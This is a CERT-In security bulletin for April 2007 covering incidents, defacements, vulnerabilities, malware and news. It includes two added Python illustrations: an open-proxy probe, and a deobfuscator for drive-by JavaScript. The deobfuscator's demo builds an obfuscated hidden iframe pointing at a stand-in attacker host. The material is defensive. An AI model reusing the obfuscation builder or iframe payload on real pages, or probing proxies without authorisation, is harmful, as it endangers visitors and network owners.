CERT-In Monthly Security Bulletin April 2007
Cyber Intrusion Trends
During this month 33 security incidents were reported to CERT-In by various national and international agencies. As shown in the figure, 58% of the incidents were phishing, including two incidents reported by an Indian bank; 18% were virus/worm incidents under the malicious code category; and 24% were unauthorized scanning incidents. Compared with the previous month, the number of phishing incidents decreased while virus/worm and scanning incidents increased.

Figure: Cyber Intrusion during April 2007

Indian Websites Defacement

In total, 306 Indian websites were defaced during April 2007. Most of the defaced sites were under the .com domain. A chart of defacements by Top Level Domain (TLD) is shown in the figure.

The vulnerabilities that might have been exploited in these defacements are:

  1. PHP imap_mail_compose(), GD graphics library and PHP-Fusion SQL injection vulnerabilities (CIAD-2007-19)
  2. Multiple Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution and Cross-Site Scripting Attacks (CIVN-2007-44)

Figure: Statistics of Defaced Indian Websites in April 2007

Open proxy servers

A proxy server that does not restrict its client base to its own set of clients, but allows any other client to connect to it, is known as an open proxy server. An open proxy server accepts client connections from any IP address and makes connections to any Internet resource on their behalf. Such servers are abused to relay spam and attacks while hiding the originating address, so the victim of the relayed traffic sees only the proxy.

CERT-In tracked 60 open proxy servers operating in India during April 2007. The ISPs concerned were alerted immediately to shut down the open proxy servers. A bar chart of open proxy servers tracked during this year is shown in the figure.

Figure: Statistics of Open Proxy Servers tracked during July 2006 - April 2007
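As an added illustration of the definition above (not CERT-In tooling and not part of the original bulletin), the check below sends one absolute-URI request through a candidate proxy and classifies the answer: a proxy that returns a success status for a third-party URL it has no business fetching for a stranger is open, one that answers 4xx/5xx is restricted, and silence or garbage is recorded as no response. The fake proxy class is a constructed stand-in so the demo runs offline; PROBE_URL and the loopback port layout are assumptions. Probe only proxies you are authorised to test.

```python
"""Open-proxy probe: does an HTTP proxy relay requests for arbitrary
external hosts on behalf of any client?  Added illustration for this
bulletin, not CERT-In tooling."""
import socket
import socketserver
import threading
from urllib.parse import urlsplit

# Assumed probe target: a third-party URL the proxy should only fetch
# for its own authorised clients.
PROBE_URL = "http://example.com/"


def probe_proxy(host, port, probe_url=PROBE_URL, timeout=5.0):
    """Send an absolute-URI GET through host:port and classify the reply.

    'open'        - 2xx/3xx: the proxy fetched a third-party resource for us
    'restricted'  - 4xx/5xx: the proxy answered but refused (ACL, auth, ...)
    'no-response' - connect/read failure or no parsable HTTP status line
    """
    target_host = urlsplit(probe_url).hostname
    request = (
        f"GET {probe_url} HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        "Proxy-Connection: close\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    reply = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            while b"\r\n" not in reply:        # read until the status line is complete
                chunk = s.recv(1024)
                if not chunk:
                    break
                reply += chunk
    except OSError:
        return "no-response"
    parts = reply.split(b"\r\n", 1)[0].split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/") or not parts[1].isdigit():
        return "no-response"
    code = int(parts[1])
    return "open" if 200 <= code < 400 else "restricted"


class _FakeProxy(socketserver.BaseRequestHandler):
    """Constructed stand-in for a real proxy so the demo runs offline.
    Subclasses set `policy` to 'open' (relay anything) or 'restricted'."""
    policy = "open"

    def handle(self):
        self.request.settimeout(2.0)
        try:
            self.request.recv(4096)             # consume the probe request
        except OSError:
            return
        if self.policy == "open":
            body = b"<html>relayed for you</html>"
            self.request.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n%s"
                                 % (len(body), body))
        else:
            self.request.sendall(b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n")


def run_demo(policy):
    """Start a fake proxy with the given policy on a free loopback port,
    probe it, and return probe_proxy's classification."""
    handler = type("Handler", (_FakeProxy,), {"policy": policy})
    with socketserver.TCPServer(("127.0.0.1", 0), handler) as srv:
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        try:
            host, port = srv.server_address
            return probe_proxy(host, port, timeout=2.0)
        finally:
            srv.shutdown()


if __name__ == "__main__":
    for policy in ("open", "restricted"):
        print(f"fake proxy policy={policy!r:12} -> probe says {run_demo(policy)!r}")
```

The probe deliberately uses a plain absolute-URI GET rather than CONNECT, because that is the request form an HTTP/1.1 proxy relays for web traffic; a proxy that relays CONNECT to arbitrary ports is a separate, usually worse, finding and would need a second probe.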

Security Alerts

The critical and medium-severity vulnerabilities in operating systems, application software and network devices disclosed during April 2007, their countermeasures, and widely spreading malicious code (viruses, worms and Trojans) are given below:

High Vulnerabilities

Microsoft
Product | Title of Vulnerability | Discovery/Publish Date | CERT-In References & Patch Information
Microsoft | Multiple Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution and Cross-Site Scripting Attacks | April 11, 2007 | CIVN-2007-44
Microsoft Windows | Microsoft Windows Universal Plug and Play (UPnP) Memory Corruption Vulnerability | April 11, 2007 | CIVN-2007-45
Microsoft Windows | Microsoft Windows Agent URL Parsing Remote Code Execution Vulnerability | April 11, 2007 | CIVN-2007-46
Microsoft | Multiple Vulnerabilities in Client/Server Run-time Subsystem (CSRSS) | April 11, 2007 | CIVN-2007-47
Microsoft Windows | Multiple Vulnerabilities in Microsoft Windows GDI | April 11, 2007 | CIAD-2007-17
Microsoft Windows | Multiple Vulnerabilities in Microsoft Windows GDI, CMS, Kernel, UPnP, Agent and CSRSS | April 11, 2007 | CIAD-2007-18
Microsoft Windows | Microsoft Windows Kernel Mapped Memory Insecure Permissions Vulnerability | April 11, 2007 | CIVN-2007-48
Microsoft Windows | Remote Code Execution Vulnerability in RPC on Microsoft Windows DNS Server | April 13, 2007 | CIVN-2007-49

Unix
Product | Title of Vulnerability | Discovery/Publish Date | CERT-In References & Patch Information
PHP | PHP imap_mail_compose(), GD graphics library and PHP-Fusion SQL injection vulnerabilities | April 13, 2007 | CIAD-2007-19

Database
Product | Title of Vulnerability | Discovery/Publish Date | CERT-In References & Patch Information
Oracle | Multiple Vulnerabilities in Oracle Products | April 19, 2007 | CIAD-2007-20

Network Devices
Product | Title of Vulnerability | Discovery/Publish Date | CERT-In References & Patch Information
Cisco | Multiple Cisco Unified CallManager and Presence Server Denial of Service Vulnerabilities | April 05, 2007 | CIVN-2007-43
Cisco | Multiple Vulnerabilities in the Cisco Wireless Control System | April 18, 2007 | CIVN-2007-51
Cisco | Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points | April 18, 2007 | CIVN-2007-52

Miscellaneous
Product | Title of Vulnerability | Discovery/Publish Date | CERT-In References & Patch Information
IBM Lotus Domino | IBM Lotus Domino Server LDAP Request Invalid DN Message Heap Overflow Vulnerability | April 02, 2007 | CIVN-2007-40
IBM Lotus Domino | IBM Lotus Domino Web Access Cross Site Scripting Vulnerability | April 02, 2007 | CIVN-2007-41
IBM Lotus Sametime | IBM Lotus Sametime JNILoader Arbitrary DLL Load Vulnerability | April 02, 2007 | CIVN-2007-42
Mozilla | Arbitrary code vulnerability in Mozilla | April 02, 2007 | CVE-2007-1794, CVE-2006-3805
Symantec | Symantec Enterprise Security Manager Remote Upgrade Authentication Bypass Vulnerability | April 13, 2007 | CIVN-2007-50
Mozilla Firefox | Mozilla Firefox Wizz RSS News Reader Extension Cross-Zone Scripting Vulnerability | April 18, 2007 | CIVN-2007-53
Mozilla Firefox | Unspecified vulnerability in Mozilla Firefox | April 27, 2007 | CVE-2007-2176

Medium Vulnerabilities

Unix
Product | Title of Vulnerability | Discovery/Publish Date | CERT-In References & Patch Information
Apache HTTP Server | Multiple race conditions in suexec in Apache HTTP Server (httpd) | April 13, 2007 | CVE-2007-1741
phpMyAdmin | phpMyAdmin "PMA_sanitize()" and "fieldkey" Handling Cross Site Scripting Vulnerabilities | April 24, 2007 | CVE-2007-2245
Malicious Code Threats

Each entry lists: Title of Malicious Code, Type, Overview, Aliases, Discovery Date, References.

W32.Almanahe.A
  Type: Worm
  Overview: A polymorphic worm that infects executable files. It attempts to spread to network shares and removable drives.
  Aliases: None
  Discovery Date: April 13, 2007
  Reference: http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-041317-4330-99

Pykse Worm
  Type: Worm
  Overview: Propagates by being downloaded from malicious sites or via Skype, by sending messages containing a malware link to all online addresses found in the Skype contact list.
  Aliases: Trojan.Downloader-5467, Worm.IM.Picse.A, IM-Worm.Win32.Pykse.a [F-Secure], WORM_PYKSE.A [Trend Micro]
  Discovery Date: April 20, 2007
  Reference: http://www.cert-in.org.in/virus/Pykse_Worm.htm

Win32/Banker
  Type: Trojan
  Overview: Targets online banking users. It steals confidential data such as logins, passwords and PINs required to access online bank accounts.
  Aliases: Trojan-Spy:W32/Agent.QY [F-Secure], Trojan-Spy.Win32.Banker.cmb [Kaspersky], Spy/BanSpy [Fortinet], Trj/Wsnpoem.L [Panda]
  Discovery Date: April 23, 2007
  Reference: http://www.cert-in.org.in/virus/Win32_Banker.htm

W32.Validin
  Type: Worm
  Overview: A worm that infects .html files and deletes .gho files. It spreads by copying itself to removable drives and also downloads potentially malicious files onto the compromised computer.
  Aliases: None
  Discovery Date: April 23, 2007
  Reference: http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-042306-2226-99&tabid=2

Trojan.Kardphisher
  Type: Trojan
  Overview: A Trojan that attempts to steal credit card numbers by tricking the user into entering their card details to "activate Windows".
  Aliases: None
  Discovery Date: April 26, 2007
  Reference: http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-042705-0108-99
Security News

Zombies infiltrate US military networks
[Source: www.theregister.co.uk]

Security researchers have traced spam-sending botnet clients back to networks run by the US military. Support Intelligence, the firm whose research on honeynets revealed that the networks of at least 28 Fortune 1000 companies contained malware-infected spam-spewing PCs, has found evidence of bots running behind military networks.


Phishing attack evades bank's two-factor authentication
[Source: www.theregister.co.uk]

A two-factor authentication system operated by Dutch bank ABN Amro has been compromised and money stolen from the online accounts of customers who fell for a phishing scam. Two-factor authentication for online banking usually involves passwords and tokens which provide synchronised, constantly changing numbers to use as additional evidence of identity.


Phishers spread their nets
[Source: www.theregister.co.uk]

The percentage of US-hosted phishing attacks dropped from 74 per cent in February to 55 per cent in March, according to the latest online fraud report of security firm RSA. Last month also witnessed a "dramatic increase" in the number of brands targeted by email scams, from 153 in February to 202 in March, even as the number of phishing attacks dropped slightly.


McAfee: .gov sites are safest
[Source: www.zdnetasia.com]

The safest Web sites on the Internet end in .gov, according to security firm McAfee. McAfee found no risky Web sites within the domain for U.S. government agencies, it said in a report published Monday. In contrast, one in 10 Web sites that end in .tk, the domain for the tiny island of Tokelau, either spread malicious software or warrant a warning because of pop-ups or other nuisances, McAfee said.


Scumbag malware authors exploit Virginia Tech tragedy
[Source: www.theregister.com]

Pond-dwelling virus writers have crafted a malware attack that poses as camera phone footage of the shootings at Virginia Tech University that claimed 32 lives on Monday. Spam email messages carry a photograph of gunman Cho Seung-hui and claim to link to a Brazilian movie website carrying footage of the campus shootings. Surfers who click on the link will find only a malicious screensaver file (TERROR_EM_VIRGINIA.SCR) that attempts to install a banking spyware Trojan horse on the Windows PCs of prospective marks, anti-virus firm Sophos reports. The Packer Trojan horse attempts to steal online banking credentials. This login information offers cybercrooks the chance to subsequently clean out online banking accounts.


Worm exploits Windows DNS hole
[Source: www.news.com.com]

McAfee on Monday afternoon said it had spotted a variant of Nirbot that appears to exploit the recently disclosed vulnerability in the Windows DNS service. Nirbot is a typical botworm that gives an attacker full control over an infected computer via an Internet Relay Chat channel, McAfee said. "An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDoS (distributed denial-of-service) attack on Internet systems," according to McAfee's description of the pest. There are multiple versions of the Nirbot family, which is also known as Rinbot.


New IM worm targets Skype users
[Source: news.com.com]

A new instant-messaging pest that spreads using the chat feature in Skype has surfaced, security firm F-Secure warned Monday. The worm, dubbed Pykse.A, is similar to threats that affect instant-messaging applications. A targeted Skype user will receive a chat message with text and a Web link that looks like it goes to a JPEG file on a Web site, F-Secure said on its Web site. Clicking the link will redirect the user to a malicious file. The file, after executing, will send a malicious link to all online contacts in a Skype user's list and will show a picture of a scantily clad woman, F-Secure said. In addition, it sets the user's Skype status message to "Do Not Disturb," the security firm said.


Poor e-mail practices pose security risk
[Source: www.zdnetasia.com]

SINGAPORE --Cybercriminals are still using e-mail as a means to launch malware attacks on enterprises, according to a senior executive at Cisco Systems.

"E-mail is still the vehicle by which they can infect corporations," said John Stewart, Cisco's chief security officer, in a teleconference Tuesday with journalists and analysts. Referring to a Cisco study conducted last year, Stewart said that regardless of country, over 10 percent of respondents will still "double click on all e-mail [messages], no matter where they come from". Attackers, he said, exploit this vulnerability to spread malware, and "one out of 10 [people] get infected [by malware] because of bad behavior".


Entrepreneurial hackers buy sponsored links on Google
[Source: www.computerworld.com]

Ad links sidetracked users, installed password stealer
A hacker scheme that involved buying search keywords on Google and then routing users to a malicious site when they clicked on sponsored links was revealed yesterday by a security company. According to Roger Thompson, chief technology officer at Exploit Prevention Labs, the ploy involved sponsored links (the text ads that appear alongside search results on Google), a malicious intermediary and malware that steals online banking usernames and passwords.

"It's quite an investment on the bad guys' part," said Thompson. "Instead of just hacking into sites, they bought keywords."


Report: Targeted e-mail attacks increasing
[Source: www.computerworld.com]

Stealthy, targeted cyberattacks via e-mail continue to rise, e-mail security specialist MessageLabs said Wednesday.

During March, MessageLabs intercepted 716 e-mail messages that were part of 249 targeted attacks aimed at 216 of its customers, the Gloucester, England-based provider of hosted e-mail filtering services said in a research report. Of the attacks, almost 200 consisted of a single malicious e-mail designed to infiltrate an organization, MessageLabs said.


Web attackers get better at hiding
[Source: www.zdnetasia.com]

VANCOUVER, B.C.--Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert said Wednesday.

Increasingly the actual code, often JavaScript, used to attack PCs is hidden in Flash animations or scrambled so that anyone who examines the source of a page can't easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.

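The item above describes attack scripts scrambled so that a reader of the page source cannot recognise them. As an added illustration (not code from the article or from Arbor Networks), the helper below statically peels the two wrappers that were most common in drive-by pages of that period, eval(unescape("%3C...")) and String.fromCharCode(60,105,...), without executing anything, then reports which obfuscation indicators remain and which URLs the decoded script references. The sample page and the host attacker.invalid are constructed for the demo; scripts embedded in Flash animations, the other technique the article mentions, are out of scope here.

```python
"""Static unwrapping of two obfuscation layers common in 2007-era
drive-by pages: eval(unescape("%3C...")) and String.fromCharCode(60,...).
Added illustration for this bulletin, not code from the article or from
Arbor Networks."""
import json
import re


def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX first, then %XX sequences."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


_EVAL_UNESCAPE = re.compile(r"""eval\(\s*unescape\(\s*(["'])(.*?)\1\s*\)\s*\)""", re.S)
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")


def _decode_charcodes(m):
    codes = [int(x) for x in m.group(1).split(",") if x.strip()]
    return json.dumps("".join(map(chr, codes)))   # a JSON string is a valid JS literal


def deobfuscate(js, max_rounds=10):
    """Peel eval(unescape()) and String.fromCharCode() layers until the
    text stops changing.  Purely textual: nothing is executed."""
    for _ in range(max_rounds):
        new = _EVAL_UNESCAPE.sub(lambda m: js_unescape(m.group(2)), js)
        new = _FROMCHARCODE.sub(_decode_charcodes, new)
        if new == js:
            break
        js = new
    return js


_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "percent-encoded run": re.compile(r"(?:%[0-9A-Fa-f]{2}){20,}"),
}


def indicators(js):
    """Cheap triage: which obfuscation markers does the text contain?"""
    return [name for name, rx in _INDICATORS.items() if rx.search(js)]


def extract_urls(text):
    """URLs visible in (decoded) script text; stops at quotes and backslashes."""
    return re.findall(r"""https?://[^\s"'<>\\]+""", text)


def _wrap(payload):
    """Build a sample the way a kit would: fromCharCode inside unescape()."""
    inner = "document.write(String.fromCharCode(" + ",".join(str(ord(c)) for c in payload) + "))"
    outer = "".join("%%%02X" % ord(c) for c in inner)
    return 'eval(unescape("' + outer + '"))'


# Constructed sample page; attacker.invalid is a placeholder host.
SAMPLE_PAGE = ("<html><body><p>welcome</p><script>"
               + _wrap('<iframe src="http://attacker.invalid/x.php" width=0 height=0></iframe>')
               + "</script></body></html>")


if __name__ == "__main__":
    print("indicators before:", indicators(SAMPLE_PAGE))
    clear = deobfuscate(SAMPLE_PAGE)
    print("decoded script  :", clear)
    print("URLs            :", extract_urls(clear))
```

Two layers are enough to hide an iframe from a casual look at the source, which is why the indicator check matters more than any single decoder: a page that still shows eval, unescape, fromCharCode or long percent-encoded runs after decoding is using a layer this helper does not know, and needs a sandboxed browser rather than more regular expressions.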

Major brands see rise in online fraud
[Source: www.news.com.com]

Corporate brands face multipronged assaults from fraudulent online attackers, according to a report published Monday that quantifies the scope of the most common threats.

MarkMonitor, which supplies Internet brand protection services to companies, said its new "Brandjacking Index" found cybersquatting--in which illicit sites usurp popular trademarks--false association, phishing and click fraud as major threats. A four-week survey of public Web sites completed early in April found cybersquatting posed the greatest threat to brands. Phishing--the criminal use of e-mail to trick consumers into divulging passwords, credit cards and other personal details--and domain "kiting"--the rapid registering and dropping of similar-sounding Web site names--are on the rise.


US still top of the spam pops
[Source: www.viruslist.com]

The US has been named the top spam-relaying country in the world in a recent new report. In the first quarter of 2007 almost a fifth of all spam originated in the United States, while China and, surprisingly, Poland were also in the top 3 of the junk mail ratings.

Exactly half the top dozen were European countries, with Italy, France, Germany, Spain and Russia joining Poland in the rankings. South Korea, India and Taiwan represented Asia, leaving the remaining spot to Brazil. This ratio is consistent with continent-wide figures for spam relaying: Europe accounted for 35.1% of junk email in the first quarter of 2007, closely followed by Asia (33.4%) and then North America (22.9%). Australasia comes in at the tail end of the list with 0.6% of the world's spam volume.


Sophos reveals rise of web-based malware in Q1 2007
[Source: www.sophos.com]

Sophos, a world leader in IT security and control, has announced the results of its research into worldwide cybercrime activity during the first three months of 2007. The findings reveal that the overall number of new pieces of malware has grown dramatically, with the majority of malicious code writers selecting the web as their playground of choice. In the first quarter of 2007, Sophos identified 23,864 new threats - more than double the number found in the same period last year, when the company identified 9,450. At the same time, the percentage of infected email has dropped from 1.3 percent, or one in 77 emails, in the first three months of 2006, to one in 256, or just 0.4 percent, in 2007.


Data theft replaces malware as top security concern
[Source: www.theregister.com]

Theft of information and regulatory compliance are beginning to replace malware infestation and hacking as the top security concerns, according to a poll of enterprise IT security chiefs.

The second annual Cisco-sponsored poll of 100 infosec pros in large UK enterprises found that 38 per cent of respondents place theft of information as their number one concern, while 33 per cent fret about regulatory compliance. Viruses, the prime concern of 55 per cent of respondents in 2006, were cited by just 27 per cent as their top fear this year.
